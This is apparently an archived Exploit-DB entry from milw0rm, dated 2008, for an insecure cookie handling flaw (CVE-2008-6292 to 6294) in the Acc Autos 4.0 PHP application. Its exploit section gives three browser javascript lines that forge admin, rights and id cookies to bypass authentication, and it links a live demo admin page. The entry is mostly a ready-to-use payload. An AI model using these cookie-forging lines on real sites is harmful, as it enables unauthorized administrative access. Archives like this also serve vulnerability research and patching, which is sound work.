Acc Autos 4.0 Insecure Cookie Handling Vulnerability

2008-11-03T00:00:00
ID EDB-ID:6968
Type exploitdb
Reporter x0r
Modified 2008-11-03T00:00:00

Description

Acc Autos 4.0 Insecure Cookie Handling Vulnerability. CVE-2008-6292,CVE-2008-6293,CVE-2008-6294. Webapps exploit for php platform

                                        
                                            -==========================================-
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug:  Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
-==========================================-
Exploit:

[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";

Live Demo:

http://www.accscripts.com/autos/demo/admin/

Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO.

# milw0rm.com [2008-11-03]